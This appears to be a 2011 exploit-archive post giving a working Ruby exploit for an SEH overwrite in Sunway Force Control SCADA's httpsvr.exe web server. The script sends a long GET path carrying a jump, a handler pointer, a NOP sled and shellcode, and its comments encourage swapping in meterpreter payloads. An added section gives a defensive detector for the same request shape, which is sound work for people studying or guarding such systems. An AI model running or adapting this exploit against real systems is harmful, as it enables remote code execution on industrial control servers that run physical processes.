Sunway Force Control SCADA 6.1 SP3 SEH Overwrite
Posted on 27 August 2011
```ruby
# encoding: binary
# (the magic comment above makes every string literal raw bytes, so the
#  shellcode.length arithmetic below counts bytes, not characters)
#
# Sunway Force Control SCADA httpsvr.exe Exploit
# Exploitable with simple SEH Overwrite technique
# Tested on XP SP0 English
# Probably will work on XP SP3 if you find a non-SafeSEH dll for the p/p/r pointer
# Canberk BOLAT | @cnbrkbolat
# cbolat.blogspot.com
# for fun ;)
#
# notez: other payloads are not working stably because of the memory region's status.
# I tested meterpreter/bind_tcp and others; some of them do not work because
# they try to write to unwritable memory regions.
# If you write some asm to change the access protection of the memory region
# it can work. Try it, do it!
#
# Vendor: http://www.sunwayland.com.cn/

require 'socket'

# Connects to the target, writes the request and returns true if the server
# answered, false if the connection failed. (Renamed from `send` so the
# script does not shadow Object#send.)
def send_packet(packet)
  begin
    sock = TCPSocket.new(@ip, @port)
    sock.write(packet)
  rescue Exception
    return false
  else
    resp = sock.recv(1024)
    sock.close
    return true
  end
end

@ip   = ARGV[0]
@port = 80

# windows/exec CMD=calc.exe
shellcode =
  "\xb8\xd5\x45\x06\xc4\xda\xde\xd9\x74\x24\xf4\x5b\x33\xc9" +
  "\xb1\x33\x31\x43\x12\x03\x43\x12\x83\x3e\xb9\xe4\x31\x3c" +
  "\xaa\x60\xb9\xbc\x2b\x13\x33\x59\x1a\x01\x27\x2a\x0f\x95" +
  "\x23\x7e\xbc\x5e\x61\x6a\x37\x12\xae\x9d\xf0\x99\x88\x90" +
  "\x01\x2c\x15\x7e\xc1\x2e\xe9\x7c\x16\x91\xd0\x4f\x6b\xd0" +
  "\x15\xad\x84\x80\xce\xba\x37\x35\x7a\xfe\x8b\x34\xac\x75" +
  "\xb3\x4e\xc9\x49\x40\xe5\xd0\x99\xf9\x72\x9a\x01\x71\xdc" +
  "\x3b\x30\x56\x3e\x07\x7b\xd3\xf5\xf3\x7a\x35\xc4\xfc\x4d" +
  "\x79\x8b\xc2\x62\x74\xd5\x03\x44\x67\xa0\x7f\xb7\x1a\xb3" +
  "\xbb\xca\xc0\x36\x5e\x6c\x82\xe1\xba\x8d\x47\x77\x48\x81" +
  "\x2c\xf3\x16\x85\xb3\xd0\x2c\xb1\x38\xd7\xe2\x30\x7a\xfc" +
  "\x26\x19\xd8\x9d\x7f\xc7\x8f\xa2\x60\xaf\x70\x07\xea\x5d" +
  "\x64\x31\xb1\x0b\x7b\xb3\xcf\x72\x7b\xcb\xcf\xd4\x14\xfa" +
  "\x44\xbb\x63\x03\x8f\xf8\x9c\x49\x92\xa8\x34\x14\x46\xe9" +
  "\x58\xa7\xbc\x2d\x65\x24\x35\xcd\x92\x34\x3c\xc8\xdf\xf2" +
  "\xac\xa0\x70\x97\xd2\x17\x70\xb2\xb0\xf6\xe2\x5e\x19\x9d" +
  "\x82\xc5\x65"

# Filler up to the SEH record, then nSEH / SEH, a small NOP sled, the
# shellcode and padding to a fixed total length.
payload  = "H" * 1599
payload << "\xeb\x06\x90\x90"        # Pointer to Next SE Handler (short jmp +6)
payload << [0x719737FA].pack("V*")   # SEH Handler - p/p/r
payload << "\x90" * 40
payload << shellcode
payload << "\x90" * (4058 - shellcode.length)

# The overflow is carried in the request path; CRLF line terminators added
# so the request is well formed.
pack  = "GET /#{payload} HTTP/1.1\r\n"
pack << "Host: http://#{@ip}:#{@port}\r\n\r\n"

puts "packet sent." if send_packet(pack)
```
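From the defender's side, the request the script above builds has a very recognisable shape: a GET path thousands of bytes long, a single filler byte repeated for most of it, a NOP sled and the two-byte short jump used as the nSEH record. The following detector is an added example, not part of the original exploit or the vendor's software; the length and run thresholds are assumptions for an httpsvr.exe listener, and the sample requests are constructed, not captured traffic.

```ruby
# Added example, not part of the original exploit: a detector for the request
# shape the script above sends (oversized GET path, long filler/NOP runs, the
# nSEH short-jump bytes). Thresholds are assumptions for an httpsvr.exe listener.
MAX_URI_BYTES = 1024          # assumed: legitimate paths on this server are short
MIN_RUN_BYTES = 64            # assumed: a run this long looks like filler or a NOP sled
SEH_JUMP      = "\xeb\x06".b  # short jmp +6, the nSEH overwrite used on this page

# Longest run of one repeated byte in +bytes+ (binary string).
def longest_byte_run(bytes)
  best = run = 0
  prev = nil
  bytes.each_byte do |b|
    run = (b == prev) ? run + 1 : 1
    best = run if run > best
    prev = b
  end
  best
end

# Inspects one raw HTTP request and returns the reasons it looks like an
# SEH-overwrite attempt; an empty array means nothing suspicious was found.
def inspect_request(raw)
  request_line = raw.b.split("\r\n", 2).first.to_s
  method, uri, _version = request_line.split(" ", 3)
  return ["not an HTTP request line"] unless method && uri
  reasons = []
  reasons << "uri length #{uri.bytesize} > #{MAX_URI_BYTES}" if uri.bytesize > MAX_URI_BYTES
  run = longest_byte_run(uri)
  reasons << "filler run of #{run} identical bytes" if run >= MIN_RUN_BYTES
  reasons << "nSEH short-jump pattern present" if uri.include?(SEH_JUMP)
  reasons << "non-printable bytes in uri" if uri.bytes.any? { |b| b < 0x20 || b > 0x7e }
  reasons
end

# Constructed samples (not captured traffic): a benign request and one shaped
# like the exploit, with "AAAA" as a placeholder for the SEH handler address.
BENIGN_REQUEST = "GET /index.htm HTTP/1.1\r\nHost: 192.0.2.10\r\n\r\n".b
ATTACK_REQUEST = "GET /".b + "H".b * 1599 + SEH_JUMP + "\x90\x90".b + "AAAA".b +
                 "\x90".b * 40 + " HTTP/1.1\r\nHost: 192.0.2.10\r\n\r\n".b

if __FILE__ == $PROGRAM_NAME
  puts "benign: #{inspect_request(BENIGN_REQUEST).inspect}"
  puts "attack: #{inspect_request(ATTACK_REQUEST).inspect}"
end
```

Run over reassembled requests from a capture or a reverse proxy log in front of the SCADA web server, any hit on the length or run checks is worth an alert on its own; the nSEH pattern check narrows it to SEH-style overwrites like this one.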
